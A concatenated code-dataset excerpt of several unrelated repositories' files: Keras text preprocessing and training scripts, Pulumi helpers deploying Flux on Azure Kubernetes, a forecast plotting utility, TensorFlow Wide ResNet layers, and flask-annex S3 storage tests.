tokenize = Tokenizer(num_words=ut.params.n_vocab,
char_level=False,
filters='0123456789!"#$%&()*+,-./:;<=>?@[\]^_`{|}~',
lower=True,
split=delim)
to_embed = data[column]
tokenize.fit_on_texts(to_embed)
embed_dict = pd.DataFrame.from_dict(tokenize.word_index, orient="index")
embed_dict.to_csv(os.path.join(ut.dirs.raw_dir, 'embeddings.csv'))
del embed_dict
#description = tokenize.texts_to_matrix(data[column])
embeddings = tokenize.texts_to_sequences(to_embed)
embeddings = pad_sequences(embeddings, maxlen=ut.params.n_words)
data['tokenized_title'] = embeddings.tolist()
return data
def make_clean(self, data):
data = self.make_clean_title(data)
data = self.make_clean_imagecontent(data)
data = self.make_expanded_categories(data)
data = self.make_keras_embeddings(data)
data = self.make_clean_sku(data)
data = data.dropna().reset_index(drop=True)
return data
class stat_selection:
def __init__(self, column='category', quant=None, sample_size=None):
self.column = column
self.quant = quant
self.sample_size = sample_size
def count_categories(self, data):
if(self.column in data.columns):
return pd.DataFrame(data[self.column]
.value_counts())\
.reset_index()\
.rename({'index': self.column,
self.column: 'counts'},
axis='columns')
else:
print(self.column, 'not in DataFrame columns!')
print('Select from', data.columns)
sys.exit()
def select_category_threshold(self, data):
if(self.quant is not None):
df_cats = self.count_categories(data)
cutoff = None
if(type(self.quant) is float):
cutoff = df_cats.counts.quantile(self.quant)
                print('Select from', self.column, 'of the DataFrame all entries',
                      'that lie above the', self.quant, 'quantile')
elif(type(self.quant) is int):
cutoff = self.quant
print('Select from', self.column, 'of the DataFrame all entries with',
'more than', cutoff, 'samples')
else:
print('Cutoff has wrong data type')
sys.exit()
if(cutoff is not None):
list_cats = df_cats[df_cats['counts'] > cutoff][self.column].tolist()
del df_cats
return data[data[self.column].isin(list_cats)].reset_index(drop=True)
else:
print('Choose a different quantile.')
sys.exit()
else:
return data.reset_index(drop=True)
def select_equalized_subsample(self, data):
if(self.sample_size is not None):
df_cats = self.count_categories(data)
df_sub = pd.DataFrame()
for idx, cat_rows in df_cats.iterrows():
if(cat_rows.counts > 1./self.sample_size):
cat = cat_rows[self.column]
df_temp = data[data[self.column] == cat]\
.sample(frac=self.sample_size,
random_state=ut.params.seed)
df_sub = pd.concat([df_sub, df_temp])
del df_temp
del df_cats
del data
return df_sub.reset_index(drop=True)
else:
return data.reset_index(drop=True)
def make_selection(self, data):
data = self.select_equalized_subsample(data)
data = self.select_category_threshold(data)
return data
def make_categorical(data):
data['cat_category'] = data['category'].astype('category').cat.codes
data['cat_product_category'] = data['product_category'].astype('category').cat.codes
data['cat_product_type'] = data['product_type'].astype('category').cat.codes
data['cat_product_details'] = data['product_details'].astype('category').cat.codes
return data
def working_df(clean_title=True, column='category', quantile=None, sample_size=None):
df_clean_dir = os.path.join(ut.dirs.raw_dir, ut.df_names.cleaned_df)
df_return = None
if(os.path.exists(df_clean_dir) is False or os.stat(df_clean_dir).st_size == 0):
df_dir = os.path.join(ut.dirs.raw_dir, ut.df_names.original_df)
df = read_df(df_dir).dropna().reset_index(drop=True)
df_cleaned = preparation(clean_title).make_clean(df)
save_df(df_cleaned, df_clean_dir)
del df
else:
df_cleaned = read_df(df_clean_dir).dropna()
df_return = stat_selection(column, quantile, sample_size).make_selection(df_cleaned)
del df_cleaned
return make_categorical(df_return)
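# --- Hedged usage sketch (not part of the original module) ---
# Build the working DataFrame, keeping only product categories above the
# median frequency and drawing a 20% per-category subsample. The column name
# and thresholds are illustrative assumptions; the call still needs the raw
# CSV files expected under ut.dirs.raw_dir.
if __name__ == '__main__':
    df = working_df(clean_title=True,
                    column='product_category',
                    quantile=0.5,
                    sample_size=0.2)
    print(df[['title', 'product_category', 'cat_product_category']].head())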
```
#### File: src/models/train_model.py
```python
import os
import click
import logging
from pathlib import Path
from dotenv import find_dotenv, load_dotenv
from keras.callbacks import ModelCheckpoint, EarlyStopping
import src.utils.utils as ut
import src.utils.model_utils as mu
import src.models.model as md
import src.models.data_generator as dg
import src.data.dataframe as dat
def train(classmode, modelmode, batch_size, epochs, learning_rate):
train = dat.read_df(os.path.join(ut.dirs.processed_dir, ut.df_names.train_df))
nclasses = mu.ref_n_classes(classmode)
valid = dat.read_df(os.path.join(ut.dirs.processed_dir, ut.df_names.valid_df))
traindata = dg.DataSequence(train,
ut.dirs.train_dir,
batch_size=batch_size,
classmode=classmode,
modelmode=modelmode)
validdata = dg.DataSequence(valid,
ut.dirs.validation_dir,
batch_size=batch_size,
classmode=classmode,
modelmode=modelmode)
model = md.custom(classmode, modelmode, nclasses).make_compiled_model(learning_rate)
model.summary()
save_model_to = os.path.join(ut.dirs.model_dir, classmode + '_' + modelmode + '.h5')
Checkpoint = ModelCheckpoint(save_model_to,
monitor='val_loss',
verbose=0,
save_best_only=False,
save_weights_only=False,
mode='auto',
period=1)
Earlystop = EarlyStopping(monitor='val_loss',
min_delta=0,
patience=5,
verbose=0,
mode='auto',
baseline=None)
model.fit_generator(generator=traindata,
steps_per_epoch=len(train)//batch_size,
validation_data=validdata,
validation_steps=len(valid)//batch_size,
epochs=epochs,
callbacks=[mu.TrainValTensorBoard(write_graph=False),
Checkpoint],
#verbose=1,
use_multiprocessing=False,
workers=1)
@click.command()
@click.option('--classmode', type=str, default=ut.params.classmode,
help='choose a classmode:\n\
multilabel, multiclass\n\
(default: multilabel)')
@click.option('--modelmode', type=str, default=ut.params.modelmode,
help='choose a modelmode:\n\
image, text, combined\n\
(default: combined)')
@click.option('--ep', type=int, default=ut.params.epochs,
help='number of epochs (default: {})'.
format(ut.params.epochs))
@click.option('--lr', type=float, default=ut.params.learning_rate,
help='learning rate (default: {})'.
format(ut.params.learning_rate))
@click.option('--bs', type=int, default=ut.params.batch_size,
help='batch size (default: {})'.
format(ut.params.batch_size))
def main(classmode, modelmode, bs, ep, lr):
classmode, modelmode = ut.check_modes(classmode, modelmode)
train(classmode, modelmode, bs, ep, lr)
if __name__ == '__main__':
log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
project_dir = Path(__file__).resolve().parents[2]
load_dotenv(find_dotenv())
main()
``` |
{
"source": "4c74356b41/IaC",
"score": 2
} |
#### File: wip/pulumi/helpers.py
```python
import os
import re
import secrets
import string
import pulumi
from pulumi import ResourceOptions
from pulumi_kubernetes.apps.v1 import Deployment
from pulumi_kubernetes.core.v1 import Service
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication, KeyVaultId
from azure.common.credentials import ServicePrincipalCredentials
def normalize_name(name):
regex = re.compile('[^a-zA-Z0-9]')
replaced = regex.sub('', name)
normalized = replaced[:23] if len(replaced) > 23 else replaced
return normalized
def _get_kvclient():
def auth_callback(server, resource, scope):
credentials = ServicePrincipalCredentials(
client_id = os.getenv('ARM_CLIENT_ID'),
secret = os.getenv('ARM_CLIENT_SECRET'),
tenant = os.getenv('ARM_TENANT_ID'),
resource = "https://vault.azure.net"
)
token = credentials.token
return token['token_type'], token['access_token']
kv_client = KeyVaultClient(KeyVaultAuthentication(auth_callback))
return kv_client
def get_kv_secret(name):
kv_client = _get_kvclient()
secret = kv_client.get_secret("https://placeholder.vault.azure.net/", name, KeyVaultId.version_none).value
return secret
def _get_password():
alphabet = string.ascii_letters + string.digits
password = ''.join(secrets.choice(alphabet) for i in range(20))
return password
config = pulumi.Config('aks')
PREFIX = pulumi.get_stack()
PASSWORD = config.get('password') or _get_password()
SSHKEY = config.get('sshkey') or 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxinIAIDDCradZPAgX5GzBLv00u4rigOLUbU00E44FrfMTqu5wXiejJ4ycSb1bI+//ZNgaB2UYRbPL7A9OUKY+K4sX5O84Q6DPMjo/90IANHVTLf3xTaSc7hpvXO<KEY>'
LOCATION = config.get('location') or 'westeurope'
NAMESPACE = config.get('namespace') or 'flux'
args_flux = [
"--ssh-keygen-dir=/var/fluxd/keygen",
"--k8s-secret-name=flux-ssh",
"--memcached-hostname=memcached",
"--memcached-service=",
"--git-url=<EMAIL>:v3/xxxxxx",
"--git-branch=master",
"--git-path=flux/cluster-setup,flux/{}".format(PREFIX),
"--git-user=<NAME>",
"--git-email=<EMAIL>",
"--git-set-author=false",
"--git-poll-interval=5m",
"--git-label={}".format(PREFIX),
"--git-timeout=20s",
"--sync-interval=5m",
"--git-ci-skip=false",
"--registry-exclude-image=*",
"--registry-poll-interval=5m",
"--registry-rps=200",
"--registry-burst=125",
"--registry-trace=false"
]
args_memcached = ["-m 64","-p 11211","-I 1m"]
volumeMounts_flux = [
{
"name": "kubedir",
"mountPath": "/root/.kubectl"
},
{
"name": "git-key",
"mountPath": "/etc/fluxd/ssh",
"readOnly": True
},
{
"name": "git-keygen",
"mountPath": "/var/fluxd/keygen"
}
]
volumes_flux = [
{
"name": "kubedir",
"configmap": {
"name": "flux-configmap"
}
},
{
"name": "git-key",
"secret": {
"secretName": "<KEY>",
"defaultMode": 0o400 # has to be in octal
}
},
{
"name": "git-keygen",
"emptyDir": {
"medium": "Memory"
}
}
]
def _gen_service(name, ports, custom_provider, dependencies=[], service_type="ClusterIP"):
ports = [{"port": port, "target_port": port,
"name": str(port)} for port in ports]
labels = {
"app": name,
"purpose": "flux"
}
Service(name,
metadata={
"name": name,
"labels": labels,
"namespace": NAMESPACE
},
spec={
"ports": ports,
"selector": labels,
"type": service_type,
"sessionAffinity": "ClientIP"
},
__opts__=ResourceOptions(
provider=custom_provider, depends_on=dependencies)
)
def _gen_deployment(name, ports, image, custom_provider, serviceAccount, args=[], dependencies=[],
replicas=1, resources={}, env={}, volumes=[], volume_mounts=[]):
keys = ['container_port']
ports = [dict.fromkeys(keys, port) for port in ports]
labels = {
"app": name,
"purpose": "flux"
}
container = {
"name": name,
"image": image,
"imagePullPolicy": "Always",
"resources": resources,
"ports": ports,
"args": args,
"env": [
{
"name": "KUBECONFIG",
"value": "/root/.kubectl/config"
}
],
"volumeMounts": volume_mounts
}
Deployment(name,
metadata={
"name": name,
"labels": labels,
"namespace": NAMESPACE
},
spec={
"selector": {
"match_labels": labels
},
"replicas": replicas,
"template": {
"metadata": {
"labels": labels
},
"spec": {
"containers": [
container
],
"serviceAccount": serviceAccount,
"volumes": volumes
}
}
},
__opts__=ResourceOptions(
provider=custom_provider, depends_on=dependencies)
)
def gen_application(name, ports, image, customProvider, dependencies=[], serviceAccount="default", volumes=False, volumeMounts=False):
args = globals()["args_{}".format(name)]
if volumes:
volumes = globals()["volumes_{}".format(name)]
else:
volumes = []
if volumeMounts:
volumeMounts = globals()["volumeMounts_{}".format(name)]
else:
volumeMounts = []
_gen_service(name, ports, customProvider)
_gen_deployment(name, ports, image, customProvider, serviceAccount, args=args, dependencies=dependencies, volumes=volumes, volume_mounts=volumeMounts)
```
#### File: wip/pulumi/samples.py
```python
async def get_aks_credentials():
result = await get_kubernetes_cluster(name=gen_name('aks'),
resource_group_name=gen_name('rg')
)
return result.kube_config_raw
#__main__.py
import asyncio
k8s = Provider("app_provider",
kubeconfig=get_aks_credentials(),
namespace=BRANCH)
# fetch something from far away
# helpers.py
async def create_sql_database_from_existing(sql_server):
sql_client = client_factory('SqlManagementClient')
await sql_server.name.apply(lambda name: sql_client.databases.create_or_update(
gen_name(BRANCH),
name, # <pulumi.Output.outputs at 0x23463y5h3>
'TslTest',
{
'location': LOCATION,
'create_mode': 'Copy',
'sourceDatabaseId': DBID
}
)
)
#__main__.py
import asyncio
sql_server = SqlServer(
"sql",
name=resource_name,
administrator_login="rootilo",
administrator_login_password="!<PASSWORD>",
location=rg.location,
resource_group_name=rg.name,
version="12.0"
)
if not pulumi.runtime.is_dry_run():
asyncio.ensure_future(
create_sql_database_from_existing(sql_server))
``` |
{
"source": "4castRenewables/climetlab-plugin-a6",
"score": 3
} |
#### File: notebooks/utils/plot.py
```python
import matplotlib.pyplot as plt
import numpy as np
def plot_forecast_and_real_production_data(
indexes: np.ndarray,
forecast: np.ndarray,
real: np.ndarray,
) -> None:
"""Plot the forecast and real production data with residuals.
Parameters
----------
indexes : np.ndarray
Indexes of the timeseries.
forecast : np.ndarray
Forecasted production.
real : np.ndarray
Real production.
"""
fig, axs = plt.subplots(
nrows=2,
ncols=1,
figsize=(12, 8),
sharex=True,
gridspec_kw={"height_ratios": [0.8, 0.2]},
)
fig.subplots_adjust(hspace=0)
    axs[0].set_title("Power production forecast")
axs[0].plot(indexes, forecast, label="forecast")
axs[0].plot(indexes, real, label="real")
residuals = (forecast - real) / real
axs[1].scatter(indexes, residuals, color="black")
for ax in axs:
ax.grid(True)
axs[1].set_xlabel("Time")
axs[0].set_ylabel("Power production [kW]")
axs[1].set_ylabel("Residuals")
axs[0].set_xlim(min(indexes), max(indexes))
axs[0].set_ylim(0, 1.1 * max(max(forecast), max(real)))
axs[1].set_ylim(1.5 * min(residuals), 1.2 * max(residuals))
axs[0].legend()
plt.show()
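# --- Hedged usage sketch (not part of the original notebook utilities) ---
# Call the helper on synthetic data; the real notebooks pass timestamps and
# measured/forecast production in kW.
if __name__ == "__main__":
    hours = np.arange(48)
    real = 500 + 100 * np.sin(hours / 6)
    forecast = real + np.random.normal(scale=25.0, size=hours.size)
    plot_forecast_and_real_production_data(hours, forecast, real)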
``` |
{
"source": "4Catalyzer/dl-papers",
"score": 3
} |
#### File: common/data/batch_iterator.py
```python
import sys
import threading
from tqdm import tqdm
import numpy as np
import pandas as pd
import six
from six.moves.queue import Queue
from ..utils import if_none
__all__ = ('BatchIterator',)
# -----------------------------------------------------------------------------
DONE = object()
# -----------------------------------------------------------------------------
class BufferedIterator(six.Iterator):
def __init__(self, source, buffer_size=2):
assert buffer_size >= 2, "minimum buffer size is 2"
# The effective buffer size is one larger, because the generation
# process will generate one extra element and block until there is room
# in the buffer.
self.buffer = Queue(maxsize=buffer_size - 1)
def populate_buffer():
try:
for item in source:
self.buffer.put((None, item))
except:
self.buffer.put((sys.exc_info(), None))
else:
self.buffer.put(DONE)
thread = threading.Thread(target=populate_buffer)
thread.daemon = True
thread.start()
def __iter__(self):
return self
def __next__(self):
value = self.buffer.get()
if value is DONE:
raise StopIteration()
exc_info, data = value
if exc_info:
six.reraise(*exc_info)
return data
# -----------------------------------------------------------------------------
class BatchIterator(object):
def __init__(
self,
batch_size,
training_epoch_size=None,
no_stub_batch=False,
shuffle=None,
seed=None,
buffer_size=2,
):
self.batch_size = batch_size
self.training_epoch_size = training_epoch_size
self.no_stub_batch = no_stub_batch
self.shuffle = shuffle
if seed is not None:
self.random = np.random.RandomState(seed)
else:
self.random = np.random
self.buffer_size = buffer_size
def __call__(self, data, *args, **kwargs):
if if_none(self.shuffle, kwargs.get('training', False)):
shuffled_data = self.shuffle_data(data, *args)
if args:
data = shuffled_data[0]
args = shuffled_data[1:]
else:
data = shuffled_data
if self.training_epoch_size is not None:
data = data[:self.training_epoch_size]
args = tuple(
arg[:self.training_epoch_size] if arg is not None else arg
                for arg in args
)
batches, epoch_size, batch_size = self.create_batches(
data, *args, **kwargs
)
if self.buffer_size:
batches = BufferedIterator(batches, buffer_size=self.buffer_size)
# Don't wrap the batches with tqdm until after buffering, to avoid
# displaying a progress bar whilst eagerly generating batches.
return self.tqdm(batches, epoch_size, batch_size)
def shuffle_data(self, *args):
state = self.random.get_state()
shuffled_data = tuple(
            self.shuffle_array(array, state) for array in args
)
if len(shuffled_data) == 1:
return shuffled_data[0]
else:
return shuffled_data
def shuffle_array(self, array, state):
if array is None:
return None
self.random.set_state(state)
if isinstance(array, pd.DataFrame):
# Can't use sample because it's not consistent behavior for numpy
# arrays.
return array.iloc[self.random.permutation(len(array))]
elif hasattr(array, 'shuffle'):
# Handle e.g. DeferredArray, which has custom logic.
return array.permutation(self.random)
else:
return self.random.permutation(array)
def create_batches(self, data, *args, **kwargs):
batch_size = self.batch_size
if self.no_stub_batch:
epoch_size = len(data) // batch_size * batch_size
else:
epoch_size = len(data)
def batches():
for i in range(0, epoch_size, batch_size):
batch_slice = slice(i, i + batch_size)
x_batch = data[batch_slice]
args_batch = tuple(
arg[batch_slice] if arg is not None else arg
                    for arg in args
)
yield self.transform(x_batch, *args_batch, **kwargs)
return batches(), epoch_size, batch_size
def transform(self, data, *args):
return (data,) + args if args else data
def tqdm(self, batches, epoch_size, batch_size):
with tqdm(
total=epoch_size, leave=False, disable=None, unit='ex',
) as pbar:
for batch in batches:
yield batch
pbar.update(batch_size)
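# --- Hedged usage sketch (not part of the original module) ---
# Iterate shuffled mini-batches over a toy dataset. Because the module uses
# relative imports, run it as `python -m dl_papers.common.data.batch_iterator`
# (module path assumed from the repository layout).
if __name__ == '__main__':
    x = np.arange(100).reshape(50, 2)
    y = np.arange(50)
    iterator = BatchIterator(batch_size=16, shuffle=True, seed=42)
    for x_batch, y_batch in iterator(x, y):
        print(x_batch.shape, y_batch.shape)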
```
#### File: common/layers/normalization.py
```python
import tensorflow as tf
from .utils import get_axis_internal_data_format
__all__ = ('batch_normalization',)
# -----------------------------------------------------------------------------
# This should be a partial application of tf.layers.batch_normalization, but
# only tf.contrib.layers.batch_norm supports the fused option.
def batch_normalization(
inputs,
axis=-1,
momentum=0.9,
epsilon=1e-5,
center=True,
scale=True,
training=False,
name=None,
):
return tf.contrib.layers.batch_norm(
inputs,
decay=momentum,
center=center,
scale=scale,
epsilon=epsilon,
is_training=training,
fused=True,
data_format=get_axis_internal_data_format(axis),
scope=name,
)
```
#### File: common/layers/resnet.py
```python
import functools
import tensorflow as tf
from .normalization import batch_normalization
from .utils import get_channel_axis, with_variable_scope
# -----------------------------------------------------------------------------
conv2d = functools.partial(
tf.layers.conv2d,
padding='same',
use_bias=False,
)
# -----------------------------------------------------------------------------
@with_variable_scope
def bn_relu_conv(
net,
filters,
kernel_size,
bn_momentum=0.9,
dropout_rate=0,
data_format='channels_last',
training=False,
**kwargs
):
net = batch_normalization(
net,
axis=get_channel_axis(data_format),
momentum=bn_momentum,
training=training,
)
net = tf.nn.relu(net)
if dropout_rate != 0:
net = tf.layers.dropout(net, rate=dropout_rate, training=training)
net = conv2d(
net,
filters,
kernel_size,
data_format=data_format,
**kwargs
)
return net
@with_variable_scope
def scalar_gating(
net,
activation=tf.nn.relu,
k_initializer=tf.ones_initializer(),
k_regularizer=None,
k_regularizable=False,
):
# Represent this with shape (1,) instead of as a scalar to get proper
# parameter count from tfprof.
k = tf.get_variable(
'k',
(1,),
initializer=k_initializer,
regularizer=k_regularizer,
trainable=True,
)
# Per the paper, we may specifically not want to regularize k.
k.regularizable = k_regularizable
return activation(k) * net
@with_variable_scope
def residual_group(
net,
num_layers,
filters,
strides=1,
bn_momentum=0.9,
dropout_rate=0,
no_preact=False,
scalar_gate=False,
data_format='channels_last',
training=False,
):
assert num_layers % 2 == 0, "impossible number of layers"
channel_axis = get_channel_axis(data_format)
batch_normalization_bound = functools.partial(
batch_normalization,
axis=channel_axis,
momentum=bn_momentum,
training=training,
)
strided_conv2d = functools.partial(
conv2d,
filters=filters,
strides=strides,
data_format=data_format,
)
bn_relu_conv_bound = functools.partial(
bn_relu_conv,
filters=filters,
kernel_size=3,
bn_momentum=bn_momentum,
data_format=data_format,
training=training,
)
for i in range(num_layers // 2):
use_projection_shortcut = (
i == 0 and (
strides != 1 or
filters != net.get_shape()[channel_axis].value
)
)
if no_preact:
layer = strided_conv2d(net, kernel_size=3)
elif use_projection_shortcut:
net = batch_normalization_bound(net)
net = tf.nn.relu(net)
layer = strided_conv2d(net, kernel_size=3)
else:
layer = bn_relu_conv_bound(net)
layer = bn_relu_conv_bound(layer, dropout_rate=dropout_rate)
if scalar_gate:
layer = scalar_gating(layer)
if use_projection_shortcut:
net = strided_conv2d(net, kernel_size=1)
net += layer
return net
```
#### File: common/train/epochs.py
```python
import logging
import time
import tensorflow as tf
__all__ = ('run_epochs', 'iter_epochs')
# -----------------------------------------------------------------------------
logger = logging.getLogger(__name__)
# -----------------------------------------------------------------------------
class BatchManager(object):
def __init__(self, get_batches):
self._get_batches = get_batches
self._batches = get_batches()
def get_batches(self, done=False):
for batch in self._batches:
yield batch
if not done:
self._batches = self._get_batches()
# -----------------------------------------------------------------------------
def run_epochs(*args, **kwargs):
logger.info("starting session")
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
for epoch in iter_epochs(*args, **kwargs):
if isinstance(epoch, tuple):
yield (sess,) + epoch
else:
yield sess, epoch
def iter_epochs(
num_epochs,
valid_interval=None,
get_batches=(),
):
batch_managers = tuple(
BatchManager(get_batches_item)
        for get_batches_item in get_batches
)
logger.info("starting training")
start_time = time.time()
for i in range(num_epochs):
last_epoch = i == num_epochs - 1
extra = []
if valid_interval:
run_valid = i % valid_interval == 0 or last_epoch
extra.append(run_valid)
if batch_managers:
extra.extend(
batch_manager.get_batches(done=last_epoch)
                for batch_manager in batch_managers
)
if extra:
yield (i,) + tuple(extra)
else:
yield i
end_time = time.time()
logger.info("epoch {}: {:.2f}s".format(i, end_time - start_time))
start_time = end_time
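# --- Hedged usage sketch (not part of the original module) ---
# Drive a plain training loop: each epoch yields its index, a validation
# flag every `valid_interval` epochs, and a fresh batch iterator produced by
# `make_batches` (an illustrative stand-in for a real data pipeline).
if __name__ == '__main__':
    def make_batches():
        return iter(range(3))  # pretend these are mini-batches
    for epoch, run_valid, batches in iter_epochs(
        5, valid_interval=2, get_batches=(make_batches,),
    ):
        for batch in batches:
            pass  # a train step on `batch` would go here
        if run_valid:
            pass  # a validation pass would go here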
```
#### File: dl_papers/common/utils.py
```python
def if_none(value, default):
return value if value is not None else default
```
#### File: dl_papers/wide_resnet/models.py
```python
import functools
import tensorflow as tf
import dl_papers.common.layers as dl_layers
# -----------------------------------------------------------------------------
def wide_resnet_cifar(
inputs,
num_classes,
depth,
width_factor,
dropout_rate=0,
scalar_gate=False,
data_format='channels_last',
training=False,
):
assert (depth - 4) % 3 == 0, "impossible network depth"
conv2d = functools.partial(
dl_layers.resnet.conv2d,
data_format=data_format,
)
residual_group = functools.partial(
dl_layers.resnet.residual_group,
        num_layers=(depth - 4) // 3,
dropout_rate=dropout_rate,
scalar_gate=scalar_gate,
data_format=data_format,
training=training,
)
batch_normalization = functools.partial(
dl_layers.batch_normalization,
axis=dl_layers.get_channel_axis(data_format),
training=training,
)
global_avg_pooling2d = functools.partial(
tf.reduce_mean,
axis=dl_layers.get_spatial_axes(data_format),
)
net = inputs
net = conv2d(net, 16, 3, name='pre_conv')
net = residual_group(
net,
filters=16 * width_factor,
strides=1,
name='group_1',
)
net = residual_group(
net,
filters=32 * width_factor,
strides=2,
name='group_2',
)
net = residual_group(
net,
filters=64 * width_factor,
strides=2,
name='group_3',
)
net = batch_normalization(net, name='post_bn')
net = tf.nn.relu(net, name='post_relu')
net = global_avg_pooling2d(net, name='post_pool')
net = tf.layers.dense(net, num_classes, name='output')
return net
# -----------------------------------------------------------------------------
wide_resnet_cifar10 = functools.partial(
wide_resnet_cifar,
num_classes=10,
depth=16,
width_factor=4,
)
wide_gated_resnet_cifar10 = functools.partial(
wide_resnet_cifar10,
scalar_gate=True,
)
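# --- Hedged usage sketch (not part of the original module) ---
# Build the CIFAR-10 graph with the TF1-style API used above; the NHWC
# placeholder shape is an illustrative assumption.
if __name__ == '__main__':
    images = tf.placeholder(tf.float32, shape=(None, 32, 32, 3))
    logits = wide_resnet_cifar10(images, data_format='channels_last',
                                 training=True)
    print(logits)  # Tensor of shape (?, 10)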
``` |
{
"source": "4Catalyzer/flask-annex",
"score": 2
} |
#### File: flask-annex/tests/helpers.py
```python
import json
from io import BytesIO
import flask
import pytest
# -----------------------------------------------------------------------------
def assert_key_value(annex, key, value):
out_file = BytesIO()
annex.get_file(key, out_file)
out_file.seek(0)
assert out_file.read() == value
def get_upload_info(client, key, **kwargs):
response = client.get(f"/upload_info/{key}", **kwargs)
return json.loads(response.get_data(as_text=True))
# -----------------------------------------------------------------------------
class AbstractTestAnnex:
@pytest.fixture
def annex(self, annex_base):
annex_base.save_file("foo/bar.txt", BytesIO(b"1\n"))
annex_base.save_file("foo/baz.json", BytesIO(b"2\n"))
return annex_base
@pytest.fixture(autouse=True)
def routes(self, app, annex):
@app.route("/files/<path:key>", methods=("GET", "PUT"))
def file(key):
if flask.request.method != "GET":
raise NotImplementedError()
return annex.send_file(key)
@app.route("/upload_info/<path:key>")
def upload_info(key):
try:
upload_info = annex.get_upload_info(key)
except NotImplementedError:
upload_info = {
"method": "PUT",
"url": flask.url_for(
"file", key=key, _method="PUT", _external=True,
),
"headers": {
"Authorization": flask.request.headers.get(
"Authorization",
),
},
}
return flask.jsonify(upload_info)
def test_get_file(self, annex):
assert_key_value(annex, "foo/bar.txt", b"1\n")
def test_get_filename(self, tmpdir, annex):
out_filename = tmpdir.join("out").strpath
annex.get_file("foo/bar.txt", out_filename)
assert open(out_filename).read() == "1\n"
def test_list_keys(self, annex):
annex.save_file("foo/qux.txt", BytesIO(b"3\n"))
assert sorted(annex.list_keys("foo/")) == [
"foo/bar.txt",
"foo/baz.json",
"foo/qux.txt",
]
# check that dangling '/' is not relevant
assert sorted(annex.list_keys("foo/")) == sorted(
annex.list_keys("foo")
)
def test_list_keys_nested(self, annex):
assert sorted(annex.list_keys("foo/")) == [
"foo/bar.txt",
"foo/baz.json",
]
def test_save_file(self, annex):
annex.save_file("qux/foo.txt", BytesIO(b"3\n"))
assert_key_value(annex, "qux/foo.txt", b"3\n")
def test_save_filename(self, tmpdir, annex):
in_file = tmpdir.join("in")
in_file.write("4\n")
annex.save_file("qux/bar.txt", in_file.strpath)
assert_key_value(annex, "qux/bar.txt", b"4\n")
def test_replace_file(self, annex):
assert_key_value(annex, "foo/bar.txt", b"1\n")
annex.save_file("foo/bar.txt", BytesIO(b"5\n"))
assert_key_value(annex, "foo/bar.txt", b"5\n")
def test_delete(self, annex):
assert annex.list_keys("foo/bar.txt")
annex.delete("foo/bar.txt")
assert not annex.list_keys("foo/bar.txt")
def test_delete_nonexistent(self, annex):
annex.delete("@@nonexistent")
def test_delete_many(self, annex):
assert annex.list_keys("")
annex.delete_many(("foo/bar.txt", "foo/baz.json", "foo/@@nonexistent"))
assert not annex.list_keys("")
```
#### File: flask-annex/tests/test_s3.py
```python
import base64
import json
from io import BytesIO
from unittest.mock import Mock
import pytest
from flask_annex import Annex
from .helpers import AbstractTestAnnex, assert_key_value, get_upload_info
# -----------------------------------------------------------------------------
try:
import boto3
from moto import mock_s3
import requests
except ImportError:
pytestmark = pytest.mark.skipif(True, reason="S3 support not installed")
# -----------------------------------------------------------------------------
@pytest.yield_fixture
def bucket_name():
with mock_s3():
bucket = boto3.resource("s3").Bucket("flask-annex")
bucket.create()
yield bucket.name
def get_policy(upload_info):
# filter for the "policy" field; there should only be one instance
policy_items = list(
filter(lambda x: x[0] == "policy", upload_info["post_data"]),
)
policy_item = policy_items[0]
return json.loads(
base64.urlsafe_b64decode(policy_item[1].encode()).decode(),
)
def get_condition(conditions, key):
for condition in conditions:
if isinstance(condition, list):
if condition[0] == key:
return condition[1:]
else:
if key in condition:
return condition[key]
raise KeyError()
# -----------------------------------------------------------------------------
class TestS3Annex(AbstractTestAnnex):
@pytest.fixture
def annex_base(self, bucket_name):
return Annex("s3", bucket_name)
def test_save_file_unknown_type(self, annex):
annex.save_file("foo/qux", BytesIO(b"6\n"))
assert_key_value(annex, "foo/qux", b"6\n")
def test_send_file(self, client):
response = client.get("/files/foo/baz.json")
assert response.status_code == 302
s3_url = response.headers["Location"]
# FIXME: Moto doesn't support response-content-disposition, so assert
# on the generated URL rather than Moto's response.
assert "response-content-disposition=attachment" in s3_url
s3_response = requests.get(s3_url)
assert s3_response.status_code == 200
# FIXME: Workaround for spulec/moto#657.
assert "application/json" in s3_response.headers["Content-Type"]
def test_get_upload_info(self, client):
upload_info = get_upload_info(client, "foo/qux.txt")
assert upload_info["method"] == "POST"
assert upload_info["url"] == "https://flask-annex.s3.amazonaws.com/"
assert upload_info["post_data"][0] == ["Content-Type", "text/plain"]
assert upload_info["post_data"][1] == ["key", "foo/qux.txt"]
assert upload_info["post_data"][2] == ["AWSAccessKeyId", "foobar_key"]
assert upload_info["post_data"][3][0] == "policy"
assert upload_info["post_data"][4][0] == "signature"
conditions = get_policy(upload_info)["conditions"]
assert get_condition(conditions, "bucket") == "flask-annex"
assert get_condition(conditions, "key") == "foo/qux.txt"
assert get_condition(conditions, "Content-Type") == "text/plain"
self.assert_default_content_length_range(conditions)
def assert_default_content_length_range(self, conditions):
with pytest.raises(KeyError):
get_condition(conditions, "content-length-range")
def test_get_upload_info_max_content_length(self, app, client):
app.config["MAX_CONTENT_LENGTH"] = 100
upload_info = get_upload_info(client, "foo/qux.txt")
conditions = get_policy(upload_info)["conditions"]
self.assert_app_config_content_length_range(conditions)
def assert_app_config_content_length_range(self, conditions):
assert get_condition(conditions, "content-length-range") == [0, 100]
def test_get_upload_info_unknown_content_type(self, client):
upload_info = get_upload_info(client, "foo/qux.@@nonexistent")
assert upload_info["method"] == "POST"
assert upload_info["url"] == "https://flask-annex.s3.amazonaws.com/"
# filter for the "key" field; there should be only one instance
key_items = list(
filter(lambda x: x[0] == "key", upload_info["post_data"]),
)
key_item = key_items[0]
assert key_item[1] == "foo/qux.@@nonexistent"
# should not have 'Content-Type' in the post data
assert all(
post_data_pair[0] != "Content-Type"
for post_data_pair in upload_info["post_data"]
)
def test_delete_many_empty_list(self, annex, monkeypatch):
mock = Mock()
monkeypatch.setattr(annex._client, "delete_objects", mock)
annex.delete_many(tuple())
mock.assert_not_called()
class TestS3AnnexFromEnv(TestS3Annex):
@pytest.fixture
def annex_base(self, monkeypatch, bucket_name):
monkeypatch.setenv("FLASK_ANNEX_STORAGE", "s3")
monkeypatch.setenv("FLASK_ANNEX_S3_BUCKET_NAME", bucket_name)
monkeypatch.setenv("FLASK_ANNEX_S3_REGION", "us-east-1")
